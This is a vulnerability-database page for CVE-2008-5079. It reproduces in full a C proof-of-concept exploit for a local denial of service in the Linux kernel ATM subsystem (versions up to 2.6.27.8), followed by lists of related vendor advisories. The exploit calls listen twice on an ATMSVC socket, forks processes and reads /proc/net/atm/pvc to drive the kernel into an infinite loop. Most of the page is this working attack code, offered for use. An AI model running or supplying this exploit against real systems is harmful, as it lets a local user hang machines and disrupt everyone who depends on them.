Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:66036
HistoryJul 01, 2014 - 12:00 a.m.

Linux Kernel <= 2.6.27.8 - ATMSVC Local Denial of Service Exploit

2014-07-0100:00:00
Root
www.seebug.org
13

0.0004 Low

EPSS

Percentile

0.4%

JSON

No description provided by source.


                                                /*
 * cve-2008-5079.c
 *
 * Linux Kernel &#60;= 2.6.27.8 ATMSVC local DoS
 * Jon Oberheide &#60;[email protected]&#62;
 *
 * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5079:
 *
 *   net/atm/svc.c in the ATM subsystem in the Linux kernel 2.6.27.8
 *   and earlier allows local users to cause a denial of service  
 *   (kernel infinite loop) by making two calls to svc_listen for the
 *   same socket, and then reading a /proc/net/atm/*vc file, related  
 *   to corruption of the vcc table.  
 *
 */
 
#include &#60;stdio.h&#62;
#include &#60;stdlib.h&#62;
#include &#60;string.h&#62;
#include &#60;fcntl.h&#62;
#include &#60;errno.h&#62;
#include &#60;linux/atm.h&#62;
#include &#60;sys/types.h&#62;
#include &#60;sys/socket.h&#62;
#include &#60;sys/stat.h&#62;
 
#define NR_CPUS 8
#define PROC_ATM &#34;/proc/net/atm/pvc&#34;
 
int
main(void)
{
    char *err, dummy[1024];
    int i, ret, sock, proc;
    struct atm_qos qos;
    struct sockaddr_atmsvc addr;
 
    printf(&#34;[+] creating ATM socket...\n&#34;);
 
    sock = socket(PF_ATMSVC, SOCK_DGRAM, 0);
    if (sock &#60; 0) {
        err = &#34;socket(2) for type PF_ATMSVC failed&#34;;
        printf(&#34;[-] PoC error: %s (%s)\n&#34;, err, strerror(errno));
        return 1;
    }
 
    memset(&qos, 0, sizeof(qos));
    qos.rxtp.traffic_class = ATM_UBR;
    qos.txtp.traffic_class = ATM_UBR;
    qos.aal = ATM_NO_AAL;
 
    printf(&#34;[+] setting socket QoS options...\n&#34;);
 
    ret = setsockopt(sock, SOL_ATM, SO_ATMQOS, &qos, sizeof(qos));
    if (ret == -1) {
        err = &#34;setsockopt(2) for option SO_ATMQOS failed&#34;;
        printf(&#34;[-] PoC error: %s (%s)\n&#34;, err, strerror(errno));
        return 1;
    }
 
    memset(&addr, 0, sizeof(addr));
    addr.sas_family = AF_ATMSVC;
 
    printf(&#34;[+] binding socket...\n&#34;);
 
    bind(sock, (struct sockaddr *) &addr, sizeof(addr));
 
    printf(&#34;[+] socket listen...\n&#34;);
 
    listen(sock, 10);
 
    printf(&#34;[+] duplicate socket listen...\n&#34;);
 
    listen(sock, 10);
 
    printf(&#34;[+] attempting local DoS...\n&#34;);
 
    for (i = 0; i &#60; NR_CPUS; ++i) {
        if (fork() != 0) {
            break;
        }
    }
 
    proc = open(PROC_ATM, O_RDONLY);
    if (proc == -1) {
        err = &#34;opening &#34; PROC_ATM &#34; failed&#34;;
        printf(&#34;[-] PoC error: %s (%s)\n&#34;, err, strerror(errno));
        return 1;
    }
    ret = read(proc, &dummy, 1024);
    close(proc);
    
    printf(&#34;[-] Local DoS failed.\n&#34;);
 
    return 0;
}

// milw0rm.com [2008-12-10]

Related

cvelist 1
seebug 1
cve 1
prion 1
exploitpack 1
securityvulns 4
ubuntucve 1
veracode 1
nvd 1
exploitdb 1
openvas 48
nessus 16
fedora 14
redhat 3
suse 4
ubuntu 2
debian 2
osv 2
oraclelinux 1
cvelist
cvelist
CVE-2008-5079
2008-12-09 00:00:00
seebug
seebug
Linux Kernel &lt;= 2.6.27.8 ATMSVC Local Denial of Service Exploit
2008-12-11 00:00:00
cve
cve
CVE-2008-5079
2008-12-09 00:30:00
prion
prion
Design/Logic Flaw
2008-12-09 00:30:00
exploitpack
exploitpack
Linux Kernel 2.6.27.8 - ATMSVC Local Denial of Service
2008-12-10 00:00:00
securityvulns
securityvulns
CVE-2008-5079: multiple listen&#40;&#41;s on same socket corrupts the vcc table
2008-12-09 00:00:00
Linux kernel multiple security vulnerabilities
2008-12-29 00:00:00
Linux kernel multiple security vulnerabilities
2009-01-31 00:00:00
ubuntucve
ubuntucve
CVE-2008-5079
2008-12-09 00:00:00
veracode
veracode
Denial Of Service (DoS)
2020-04-10 00:29:29
nvd
nvd
CVE-2008-5079
2008-12-09 00:30:00
exploitdb
exploitdb
Linux Kernel 2.6.27.8 - ATMSVC Local Denial of Service
2008-12-10 00:00:00
openvas
openvas
RedHat Security Advisory RHSA-2009:0225
2009-01-26 00:00:00
Fedora Update for kernel FEDORA-2008-11593
2009-02-13 00:00:00
Fedora Update for kernel FEDORA-2008-11593
2009-02-13 00:00:00
nessus
nessus
Fedora 10 : kernel-2.6.27.9-159.fc10 (2008-11593)
2009-04-23 00:00:00
openSUSE Security Update : kernel (kernel-559)
2009-07-21 00:00:00
Mandriva Linux Security Advisory : kernel (MDVSA-2009:032)
2009-04-23 00:00:00
fedora
fedora
[SECURITY] Fedora 10 Update: kernel-2.6.27.9-159.fc10
2008-12-24 18:45:37
[SECURITY] Fedora 10 Update: kernel-2.6.27.12-170.2.5.fc10
2009-01-27 01:48:27
[SECURITY] Fedora 10 Update: kernel-2.6.27.25-170.2.72.fc10
2009-06-24 19:18:18
redhat
redhat
(RHSA-2009:0225) Important: Red Hat Enterprise Linux 5.3 kernel security and bug fix update
2009-01-20 00:00:00
(RHSA-2009:0021) Important: kernel security update
2009-02-24 00:00:00
(RHSA-2009:0053) Important: kernel-rt security and bug fix update
2009-02-04 00:00:00
suse
suse
local privilege escalation in kernel
2009-01-29 16:12:11
local privilege escalation in kernel
2009-01-21 20:06:24
local privilege escalation in kernel
2009-02-26 17:06:24
ubuntu
ubuntu
Linux kernel vulnerabilities
2009-01-29 00:00:00
Linux kernel vulnerabilities
2009-01-29 00:00:00
debian
debian
[SECURITY] [DSA 1687-1] New Linux 2.6.18 packages fix several vulnerabilities
2008-12-15 21:33:39
[SECURITY] [DSA 1787-1] New Linux 2.6.24 packages fix several vulnerabilities
2009-05-02 18:33:03
osv
osv
fai-kernels linux-2.6 user-mode-linux - several vulnerabilities
2008-12-15 00:00:00
linux-2.6.24 - several vulnerabilities
2009-05-02 00:00:00
oraclelinux
oraclelinux
Oracle Enterprise Linux 5.3 kernel security and bug fix update
2009-01-27 00:00:00

0.0004 Low

EPSS

Percentile

0.4%

JSON
Related for SSV:66036
cvelist1seebug1cve1prion1exploitpack1securityvulns4ubuntucve1veracode1nvd1exploitdb1openvas48nessus16fedora14redhat3suse4ubuntu2debian2osv2oraclelinux1